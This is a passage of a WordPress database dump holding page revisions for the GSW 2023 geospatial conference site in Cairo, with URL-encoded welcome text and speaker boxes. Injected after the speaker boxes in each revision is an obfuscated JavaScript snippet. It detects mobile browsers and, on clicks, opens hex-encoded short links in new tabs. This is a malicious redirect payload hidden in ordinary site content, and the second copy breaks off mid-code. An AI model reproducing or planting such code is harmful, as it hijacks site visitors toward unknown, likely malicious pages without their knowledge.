JTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','welcome','','inherit','closed','closed','','3233-revision-v1','','','2022-11-09 21:24:56','2022-11-09 21:24:56','',3233,'https://gsw2023.com/?p=3242',0,'revision','',0),
(3243,1,'2022-11-09 21:28:42','2022-11-09 21:28:42','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-0 vc_col-lg-8 vc_col-md-offset-0 vc_col-md-10 vc_col-sm-offset-0\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][/vc_column][/vc_row][vc_row][/vc_row][vc_column width=\"2/3\"][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][vc_column width=\"1/3\"][/vc_column][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n<p>[/bsf-info-box][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"][/bsf-info-box]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec